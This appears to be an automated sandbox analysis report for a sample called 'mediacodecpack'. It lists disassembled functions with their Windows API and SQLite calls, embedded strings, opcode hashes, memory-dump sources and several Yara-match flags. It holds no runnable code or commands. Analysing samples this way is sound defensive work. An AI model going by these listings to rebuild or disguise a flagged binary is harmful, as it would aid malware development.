                                                                                • Opcode ID: d66a9103e38be0e0c899919f2613304427f2a93aed9f61f9dd3763b52af6d0e3
                                                                                • Instruction ID: 756a0a2944f025bdbb1b2f85c8672ad2db3cd1c0ece63b0380458e5588457f51
                                                                                • Opcode Fuzzy Hash: d66a9103e38be0e0c899919f2613304427f2a93aed9f61f9dd3763b52af6d0e3
                                                                                • Instruction Fuzzy Hash: 3651DF31A04384AFDB20DF28E944B16BBE4EB45764F298659FA5DAB780D731EC04CB91
                                                                                APIs
                                                                                • _ValidateScopeTableHandlers.LIBCMT ref: 02D22DB0
                                                                                • __FindPESection.LIBCMT ref: 02D22DCA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FindHandlersScopeSectionTableValidate
                                                                                • String ID:
                                                                                • API String ID: 876702719-0
                                                                                • Opcode ID: 2e4b5b7005f0ca298f0d8ec41f5d127aa23224bc635db225fd6074eed29267c6
                                                                                • Instruction ID: cf4f589c4c5c1c7342864c76f2deb2ce1c37603b184d6fcd898894c3b4a54c13
                                                                                • Opcode Fuzzy Hash: 2e4b5b7005f0ca298f0d8ec41f5d127aa23224bc635db225fd6074eed29267c6
                                                                                • Instruction Fuzzy Hash: C6A1B171A002258FCB15CF18DC88BADB7A5FB58328F584669FC15A7391E731EC49CB90
                                                                                APIs
                                                                                • GetStringTypeW.KERNEL32(00000001,00408640,00000001,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 004062BD
                                                                                • GetStringTypeA.KERNEL32(00000000,00000001,0040863C,00000001,?,?,00000000,00000000,00000001), ref: 004062D7
                                                                                • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 0040630B
                                                                                • MultiByteToWideChar.KERNEL32(00405E87,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406343
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406399
                                                                                • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: StringType$ByteCharMultiWide
                                                                                • String ID:
                                                                                • API String ID: 3852931651-0
                                                                                • Opcode ID: d203232162232c56530dc1c9e7ac7d7ca2f1092592616d16a6b156e600e46040
                                                                                • Instruction ID: 1973b5c1488275f86b32e201772009c48c68fd6130b56f6c31499d13724d529d
                                                                                • Opcode Fuzzy Hash: d203232162232c56530dc1c9e7ac7d7ca2f1092592616d16a6b156e600e46040
                                                                                • Instruction Fuzzy Hash: 97418E72500219EFDF119F94DE86AAF3F78EB04350F11453AFA52F6290C73989608BE8
                                                                                APIs
                                                                                • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                  • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                • String ID: List of tree roots: $d$|
                                                                                • API String ID: 3709608969-1164703836
                                                                                • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                APIs
                                                                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D01CB1
                                                                                • CloseHandle.KERNEL32(?), ref: 02D01CBA
                                                                                • InterlockedExchangeAdd.KERNEL32(02D35264,00000000), ref: 02D01CC6
                                                                                • TerminateThread.KERNEL32(?,00000000), ref: 02D01CD4
                                                                                • QueueUserAPC.KERNEL32(02D01E7C,?,00000000), ref: 02D01CE1
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D01CEC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                • String ID:
                                                                                • API String ID: 1946104331-0
                                                                                • Opcode ID: 34d8e1871bf3c06bc50877b3fe5d7e5fca0dd9f0f380fc2bedbdbdc66174f49c
                                                                                • Instruction ID: a61d0214b75bf605333785e2c5384e961673b973405082f0f56c443da624335f
                                                                                • Opcode Fuzzy Hash: 34d8e1871bf3c06bc50877b3fe5d7e5fca0dd9f0f380fc2bedbdbdc66174f49c
                                                                                • Instruction Fuzzy Hash: A9F08135944200AFD7245B96ED09E5BBBBCEB45B217514619F56A82290DB709C14CBA0
                                                                                APIs
                                                                                  • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                  • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                  • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                  • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                • String ID: e
                                                                                • API String ID: 786425071-4024072794
                                                                                • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403A70
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                • API String ID: 1385375860-4131005785
                                                                                • Opcode ID: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
                                                                                • Instruction ID: 8e0d8efe135bd9bd4ab90b631ae35de0fa5087430b450c3f58eab12f6465c816
                                                                                • Opcode Fuzzy Hash: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
                                                                                • Instruction Fuzzy Hash: BD3102319012886DEB319A745C46B9B7F6C9B02309F2404FBE185F52C3E6389F89CB1D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_exec
                                                                                • String ID: sqlite_master$sqlite_temp_master$|
                                                                                • API String ID: 2141490097-2247242311
                                                                                • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 02D1098F
                                                                                  • Part of subcall function 02D114E3: std::exception::_Copy_str.LIBCMT ref: 02D114FC
                                                                                  • Part of subcall function 02D0FD60: __CxxThrowException@8.LIBCMT ref: 02D0FDBE
                                                                                • std::exception::exception.LIBCMT ref: 02D109EE
                                                                                Strings
                                                                                • boost unique_lock has no mutex, xrefs: 02D1097E
                                                                                • $, xrefs: 02D109F3
                                                                                • boost unique_lock owns already the mutex, xrefs: 02D109DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                • API String ID: 2140441600-46888669
                                                                                • Opcode ID: 7772e693ebe86826e9cfd3a8599c344e11ebf6076a7f21fce565ffa004cecf11
                                                                                • Instruction ID: cc6774be081ca666721f40f9f3fa885f910494d609748d609f4cf6fdf1e3c57c
                                                                                • Opcode Fuzzy Hash: 7772e693ebe86826e9cfd3a8599c344e11ebf6076a7f21fce565ffa004cecf11
                                                                                • Instruction Fuzzy Hash: 622125B19083909FD320EF24D15475BBBE9BB88B08F10491DF4A587780D7B9D848CFA2
                                                                                APIs
                                                                                • __getptd_noexit.LIBCMT ref: 02D136F0
                                                                                  • Part of subcall function 02D148E2: GetLastError.KERNEL32(774D0A60,774CF550,02D14AD0,02D12043,774CF550,?,02D05A0D,00000104,774D0A60,774CF550,ntdll.dll,?,?,?,02D05EE8), ref: 02D148E4
                                                                                  • Part of subcall function 02D148E2: __calloc_crt.LIBCMT ref: 02D14905
                                                                                  • Part of subcall function 02D148E2: __initptd.LIBCMT ref: 02D14927
                                                                                  • Part of subcall function 02D148E2: GetCurrentThreadId.KERNEL32 ref: 02D1492E
                                                                                  • Part of subcall function 02D148E2: SetLastError.KERNEL32(00000000,02D05A0D,00000104,774D0A60,774CF550,ntdll.dll,?,?,?,02D05EE8), ref: 02D14946
                                                                                • __calloc_crt.LIBCMT ref: 02D13713
                                                                                • __get_sys_err_msg.LIBCMT ref: 02D13731
                                                                                • __invoke_watson.LIBCMT ref: 02D1374E
                                                                                Strings
                                                                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D136FB, 02D13721
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                • API String ID: 109275364-798102604
                                                                                • Opcode ID: 5ecf89e8dd1c07f7ba0a680bfdb4c52965f56bc1d3e26f8400fc5ebcec771111
                                                                                • Instruction ID: 8e8fe6ccbcc77532366b035399e46863393e0ec85f2966f5c7c89f83f49f36dc
                                                                                • Opcode Fuzzy Hash: 5ecf89e8dd1c07f7ba0a680bfdb4c52965f56bc1d3e26f8400fc5ebcec771111
                                                                                • Instruction Fuzzy Hash: 49F0E2B6A447547BA7613A6ABC80A3B72CDDF457F4F0000A6FA8496F00FB25EC00C6E5
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D02350
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D02360
                                                                                • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D02370
                                                                                • GetLastError.KERNEL32 ref: 02D0237A
                                                                                  • Part of subcall function 02D01712: __EH_prolog.LIBCMT ref: 02D01717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID: pqcs
                                                                                • API String ID: 1619523792-2559862021
                                                                                • Opcode ID: d4d8a0ee084f68a354d23ce041bb76d828feb93bcdf75d8bcc31fb6b62f8e519
                                                                                • Instruction ID: c24bd8b55ad83f568720036e4857306aed30628cc4ec74e554a1351f5f5d0de4
                                                                                • Opcode Fuzzy Hash: d4d8a0ee084f68a354d23ce041bb76d828feb93bcdf75d8bcc31fb6b62f8e519
                                                                                • Instruction Fuzzy Hash: 41F09070A40304AFDB30AF64AD4CFAB77ACEB11301F500569E945C2390EBB0DD18CB90
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D04035
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D04042
                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02D04049
                                                                                • std::exception::exception.LIBCMT ref: 02D04063
                                                                                  • Part of subcall function 02D096CE: __EH_prolog.LIBCMT ref: 02D096D3
                                                                                  • Part of subcall function 02D096CE: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D096E2
                                                                                  • Part of subcall function 02D096CE: __CxxThrowException@8.LIBCMT ref: 02D09701
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 3112922283-2104205924
                                                                                • Opcode ID: 838cbeb272611997ebc95b273b5d289930ad3f1257eb1f42bb5fd503bb0c6483
                                                                                • Instruction ID: c60e00b47d8d4f6c9642650881578d614437902881b79b77051f2287489921a1
                                                                                • Opcode Fuzzy Hash: 838cbeb272611997ebc95b273b5d289930ad3f1257eb1f42bb5fd503bb0c6483
                                                                                • Instruction Fuzzy Hash: 28F05E71E00219ABDB10AFE0DA48BEE7778EF14305F504844E916A2381DB39891D8B91
                                                                                APIs
                                                                                  • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
                                                                                • sqlite3_malloc.SQLITE3 ref: 6094B1D1
                                                                                • sqlite3_value_bytes.SQLITE3 ref: 6094B24C
                                                                                • sqlite3_malloc.SQLITE3 ref: 6094B272
                                                                                • sqlite3_value_blob.SQLITE3 ref: 6094B298
                                                                                • sqlite3_free.SQLITE3 ref: 6094B2C8
                                                                                  • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                  • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                  • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                  • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
                                                                                • String ID:
                                                                                • API String ID: 683514883-0
                                                                                • Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                • Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
                                                                                • Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
                                                                                • Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91
                                                                                APIs
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
                                                                                • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
                                                                                • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
                                                                                • sqlite3_free.SQLITE3 ref: 6093A3BA
                                                                                • sqlite3_free.SQLITE3 ref: 6093A3C2
                                                                                  • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                  • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                  • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
                                                                                • String ID:
                                                                                • API String ID: 1903298374-0
                                                                                • Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                • Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
                                                                                • Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
                                                                                • Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91
                                                                                APIs
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 0040389D
                                                                                • GetFileType.KERNEL32(00000800), ref: 00403943
                                                                                • GetStdHandle.KERNEL32(-000000F6), ref: 0040399C
                                                                                • GetFileType.KERNEL32(00000000), ref: 004039AA
                                                                                • SetHandleCount.KERNEL32 ref: 004039E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2567390961.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2567390961.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                Similarity
                                                                                • API ID: FileHandleType$CountInfoStartup
                                                                                • String ID:
                                                                                • API String ID: 1710529072-0
                                                                                • Opcode ID: f9f6c698642d398b554f84be3c90f4064283888af6bbc673017cb63da6670b61
                                                                                • Instruction ID: 825ec877f99b7629084fcbf2355a8090dcaf6ef966e66130ad5ff06318bbd0a8
                                                                                • Opcode Fuzzy Hash: f9f6c698642d398b554f84be3c90f4064283888af6bbc673017cb63da6670b61
                                                                                • Instruction Fuzzy Hash: 125125B15046018FD7208F29C988B667F98BB02736F15873AE492FB3E1D7BC9A05C709
                                                                                APIs
                                                                                  • Part of subcall function 02D10A60: CloseHandle.KERNEL32(00000000,5304F1C2), ref: 02D10AB1
                                                                                  • Part of subcall function 02D10A60: WaitForSingleObject.KERNEL32(?,000000FF,5304F1C2,?,?,?,?,5304F1C2,02D10A33,5304F1C2), ref: 02D10AC8
                                                                                • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D10D2E
                                                                                • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D10D4E
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D10D87
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D10DDB
                                                                                • SetEvent.KERNEL32(?), ref: 02D10DE2
                                                                                  • Part of subcall function 02D0418C: CloseHandle.KERNEL32(00000000,?,02D10D15), ref: 02D041B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 4166353394-0
                                                                                • Opcode ID: 1e785c63aff41626f9e9c086f76f8a86883e3726709c881efc5f7b7a291b205d
                                                                                • Instruction ID: 90b83161e7b241feb82f32a5d498979bb7d714ca4b2da30d30fe1fe1ac99953d
                                                                                • Opcode Fuzzy Hash: 1e785c63aff41626f9e9c086f76f8a86883e3726709c881efc5f7b7a291b205d
                                                                                • Instruction Fuzzy Hash: C5410331640301AFDB25AF28EC80B1B77A4EF45725F140668EC18EBB95C73AEC41CBA1
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D020AC
                                                                                • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D020CD
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D020D8
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 02D0213E
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D021A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2575417882.0000000002D01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D01000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d01000_mediacodecpack.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                • String ID:
                                                                                • API String ID: 1611172436-0
                                                                                • Opcode ID: 7bcc52af48c632d28414d44bd7ab2e4ddba06026355ddab30d07b3bd368e15b0
                                                                                • Instruction ID: b2a675401b5c53316086fda83df65309683b39bb088da54465bc8235bf3893ea
                                                                                • Opcode Fuzzy Hash: 7bcc52af48c632d28414d44bd7ab2e4ddba06026355ddab30d07b3bd368e15b0
                                                                                • Instruction Fuzzy Hash: DD3139715047019FC325DF25D888B6BB7F9FBD8754F104A1EA896827A0D730E909CBA2
                                                                                APIs
                                                                                  • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                • sqlite3_mutex_enter.SQLITE3 ref: 6093A114
                                                                                • sqlite3_mutex_free.SQLITE3 ref: 6093A152
                                                                                • sqlite3_mutex_leave.SQLITE3 ref: 6093A162
                                                                                • sqlite3_free.SQLITE3 ref: 6093A1A4
                                                                                • sqlite3_free.SQLITE3 ref: 6093A1C3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2576878006.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                 • Associated: 00000003.00000002.2576857276.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577000284.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577020456.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577056487.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577082517.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                 • Associated: 00000003.00000002.2577099335.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                Similarity
